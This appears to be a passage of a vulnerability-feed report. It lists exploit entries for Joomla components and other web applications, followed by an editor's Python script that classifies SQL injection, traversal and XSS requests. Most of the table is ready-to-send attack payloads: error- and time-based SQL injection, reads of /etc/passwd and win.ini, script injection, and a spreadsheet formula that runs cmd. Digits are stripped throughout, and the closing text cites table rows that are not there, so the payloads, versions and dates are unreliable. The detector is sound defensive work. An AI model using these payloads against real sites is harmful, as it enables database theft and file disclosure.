  /gurubuy?promocode='%0/*!50000procedure*/%0/*!50000Analyse*/%0(extractvalue(0%c/*!50000concat*/(0x7%c0x4968766e05656e666e%c0xa%c@@version))%c0)%d%d%00xd

Date 07--8 | EDB-ID 457 | SQL Injection | Attack difficulty: Medium | Risk: Urgent action required
Target: Joomla! Component User Bench (version .0) - 'userid'
Attack code:
  /index.php?option=com_userbench&view=detail&userid=%0AND(SELECT%0%0FROM%0(SELECT%0COUNT(*)%cconcat((select(select%0concat(cast(database()%0AS%0CHAR)%c0x7e%c0x4968766e5656e666e))%0FROM%0INFORMATION_SCHEMA.TABLES%0WHERE%0table_schema=DATABASE()%0LIMIT%00%c)%cfloor(rand(0)*))x%0from%0information_schema.TABLES%0GROUP%0BY%0x)a)

Date 07--8 | EDB-ID 458 | SQL Injection | Attack difficulty: Medium | Risk: Urgent action required
Target: Joomla! Component My Projects (version .0)
Attack code:
  /component/myproject/verayari'and%0(select%0%0from%0(select%0count(*)%cconcat((select(select%0concat(cast(database()%0as%0char)%c0x7e))%0from%0information_schema.tables%0where%0table_schema=database()%0limit%00%c)%cfloor(rand(0)*))x%0from%0information_schema.tables%0group%0by%0x)a)%0AND%0''='

Date 07--9 | EDB-ID 465 | SQL Injection | Attack difficulty: Medium | Risk: Urgent action required
Target: Joomla! Component NextGen Editor (version ..0) - 'plname'
Attack code:
  /index.php?option=com_nge&view=config&plname='and%0(select%0%0from%0(select%0count(*)%cconcat((select(select%0concat(cast(database()%0as%0char)%c0x7e))%0from%0information_schema.tables%0where%0table_schema=database()%0limit%00%c)%cfloor(rand(0)*))x%0from%0information_schema.tables%0group%0by%0x)a)%0and%0''='

Date 07--9 | EDB-ID 479 | SQL Injection | Attack difficulty: Medium | Risk: Urgent action required
Target: BEIMS ContractorWeb (version 5.8.0.0)
Attack code:
  POST /CWEBNET/WOSummary/List HTTP/.
  User-Agent: Mozilla/5.0 Windows NT 6.; WOW64 AppleWebKit/55.7 KHTML, like Gecko Chrome/6.0.9.75
  tradestatus=%0and%0=--

Date 07--6 | EDB-ID 49 | SQL Injection | Attack difficulty: Medium | Risk: Urgent action required
Target: FAQ Pro (version 4.0.0) - 'id'
Attack code:
  /index.php?option=com_jefaqpro&view=category&id=+or++GROUP+BY+CONCAT_WS(0xa,0x4968766e5656e666e,VERSION(),FLOOR(RAND(0)*))+HAVING+MIN(0)+OR+&Itemid=494

Date 07--6 | EDB-ID 49 | LFI | Attack difficulty: Easy | Risk: Medium
Target: Biometric Shift Employee Management System (version .0) - Local File Disclosure vulnerability
Attack code:
  /index.php?user=download?name=verayari.ver&path=../../../../../etc/passwd%00

Date 07--6 | EDB-ID 495 | SQL Injection | Attack difficulty: Medium | Risk: Urgent action required
Target: Sendroid (version < 6.5.0)
Attack code:
  /API/index.php?action=compose&username=asdasd%7)%0OR%0(SELECT%0%0FROM(SELECT%0COUNT(*),CONCAT((<query>),FLOOR(RAND(0)*))x%0FROM%0/*!INFORMATION_SCHEMA*/.PLUGINS%0GROUP%0BY%0x)a)--&api_key=sdsd&sender

Date 07--6 | EDB-ID 496 | Command Injection | Attack difficulty: Hard | Risk: Urgent action required
Target: SilverStripe CMS (version .6.) - CSV Excel Macro Injection vulnerability
Attack code:
  POST /SilverStripe/admin/myprofile/EditForm/ HTTP/.
  User-Agent: Mozilla/5.0 Windows NT 6.; WOW64 AppleWebKit/55.7 KHTML, like Gecko Chrome/6.0.9.75
  FirstName=System+%40SUM(%B)*cmd%7C'+%FC+calc'!a0&surname=administrator&email=demos%40softaculous.com&password%5b_currentpassword%5d=&password%5b_Password%5D=&Password%5B_ConfirmPassword%5D=&Password%5b_passwordfieldvisible%5d=&locale=en_us&failedlogincount=0&directgroups%5b%5d=&classname=silverstripe%5csecurity%5cmember&securityid=fbdb5074d8c554bf559904a4c60&ID=&action_save=&Backurl=https%a%f%fdemos.softaculous.com%fsilverStripe%Fadmin%Fmyprofile

Date 07--7 | EDB-ID 498 | Directory Traversal | Attack difficulty: Easy | Risk: Medium
Target: Xerox DC60 EFI Fiery Controller Webtools (version .0) - Arbitrary File Disclosure vulnerability
Attack code:
  /wt/forcesave.php?file=/etc/passwd

Date 07--7 | EDB-ID 499 | XSS | Attack difficulty: Easy | Risk: High
Target: Easy!Appointments (version ..) - Cross-Site Scripting vulnerability
Attack code:
  POST /easyappointments/index.php/appointments/ajax_get_available_hours HTTP/.
  User-Agent: Mozilla/5.0 Windows NT 6.; WOW64 AppleWebKit/55.7 KHTML, like Gecko Chrome/6.0.9.75
  service_id="><script>alert()</script>&provider_id=85

Date 07--7 | EDB-ID 4405 | Directory Traversal | Attack difficulty: Easy | Risk: High
Target: DotNetNuke DreamSlider (version 0.0.0) - Arbitrary File Download vulnerability
Attack code:
  /DesktopModules/DreamSlider/DownloadProvider.aspx?File=/..\..\..\..\..\..\winnt\win.ini

Date 07-- | EDB-ID 4409 | SQL Injection | Attack difficulty: Medium | Risk: Urgent action required
Target: PHP Melody (version .7.) - 'playlist'
Attack code:
  /ajax.php?p=video&do=getplayer&vid=randomid&aid=&player=detail&playlist='+(select*from(select(sleep(0)))a)+'
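Most rows in this report are variations on a small set of MySQL techniques: UNION-based extraction, duplicate-key error-based extraction (COUNT(*) with FLOOR(RAND(0)*2) and GROUP BY), extractvalue()/updatexml() error-based extraction, schema walking with export_set() over information_schema, boolean and time-based inference; the rest are path traversal and reflected script injection. The example below is added for this report's context and is not code from the report or from Penta Security. It decodes request lines the way the backend will see them (URL decoding, and unwrapping the /*!NNNNN ... */ version comments that many payloads above hide their keywords in) and tags each line with the technique families it matches. The sample request lines are constructed for the example and the signatures and tag names are the editor's own choice, not a published rule set.

```python
import re
from urllib.parse import unquote_plus

# Constructed request lines modelled on the payload shapes in the table above
# (not copied from it): one per technique family, plus one benign request.
SAMPLE_REQUESTS = [
    "GET /lawyer-list?city=-1'+/*!50000UNION*/+/*!50000SELECT*/+1,2,CONCAT_WS(0x3a,USER(),DATABASE(),VERSION())--+-&main_search= HTTP/1.1",
    "GET /single_detail.php?sid=1%20AND%204059=4059 HTTP/1.1",
    "POST /advance_result.php keyword='and (select 1 from (select count(*),concat((select database()),floor(rand(0)*2))x from information_schema.tables group by x)a) AND ''='",
    "GET /gurubuy?promocode='%20procedure%20analyse(extractvalue(0,concat(0x7e,@@version)),0) HTTP/1.1",
    "GET /countrycode.php?val=-1'++/*!07777UNION*/+/*!07777SELECT*/+export_set(5,@:=0,(select count(*) from information_schema.columns where @:=export_set(5,export_set(5,@,table_name,0x3c6c693e,2),column_name,0xa3a,2)),@,2)--+- HTTP/1.1",
    "GET /ajax.php?p=video&playlist='+(select*from(select(sleep(10)))a)+' HTTP/1.1",
    "GET /index.php?routestring=\\..\\..\\..\\xampp\\apache\\logs\\access.log HTTP/1.1",
    "GET /index.php?user=download&path=../../../../etc/passwd%00 HTTP/1.1",
    "GET /single-video-detail.php?comment=%3Cscript%3Ealert(document.cookie)%3C/script%3E HTTP/1.1",
    "GET /lawyer-list?city=Tokyo&main_search=1 HTTP/1.1",
]

# MySQL executes the body of /*!NNNNN ... */ "version comments", which is why
# the payloads above wrap UNION/SELECT in them: keep the body, drop the markers.
MYSQL_VERSION_COMMENT = re.compile(r"/\*!\d{0,5}\s*(.*?)\*/", re.S)
PLAIN_COMMENT = re.compile(r"/\*.*?\*/", re.S)

# Signature per technique family seen in the report; names are this example's own.
SIGNATURES = {
    "sqli_union":        re.compile(r"\bunion\b(?:\s+all)?\s*\(?\s*select\b"),
    "sqli_error_dupkey": re.compile(r"floor\s*\(\s*rand\s*\(\s*0?\s*\)\s*\*\s*2\s*\).*?\bgroup\s+by\b"),
    "sqli_error_xml":    re.compile(r"\b(?:extractvalue|updatexml)\s*\("),
    "sqli_schema_walk":  re.compile(r"\bexport_set\s*\(|\binformation_schema\b"),
    "sqli_boolean":      re.compile(r"\band\s+(\d+)\s*=\s*\1\b|\belt\s*\("),
    "sqli_time":         re.compile(r"\b(?:sleep|benchmark)\s*\("),
    "path_traversal":    re.compile(r"\.\./|\.\.\\"),
    "xss_script_tag":    re.compile(r"<\s*script\b"),
}


def normalize(raw: str) -> str:
    """Decode the request the way the backend will see it before matching."""
    text = raw
    for _ in range(2):                       # tolerate one level of double-encoding
        text = unquote_plus(text)            # %XX and '+' -> literal characters / space
    text = MYSQL_VERSION_COMMENT.sub(r" \1 ", text)
    text = PLAIN_COMMENT.sub(" ", text)      # ordinary comments are whitespace to the parser
    text = text.replace("\x00", " ")         # the %00 truncation trick in the LFI row
    return re.sub(r"\s+", " ", text).lower()


def classify(raw: str) -> list:
    """Return the technique families whose signature matches the decoded request."""
    text = normalize(raw)
    return [name for name, rx in SIGNATURES.items() if rx.search(text)]


def scan(lines) -> list:
    """Tag every request line; an empty tag list means nothing matched."""
    return [(line, classify(line)) for line in lines]


if __name__ == "__main__":
    for line, tags in scan(SAMPLE_REQUESTS):
        print(f"{tags or ['clean']!s:<40} {line[:70]}")
```

Matching after decoding is the point: the raw lines for the Movie Guide and Vanguard rows above contain no readable UNION or SELECT at all, only %f*!... fragments and %c separators, so a rule that inspects the undecoded request text misses them. The dup-key and extractvalue() signatures fire on the error-based rows regardless of which column list or table name the attacker chose.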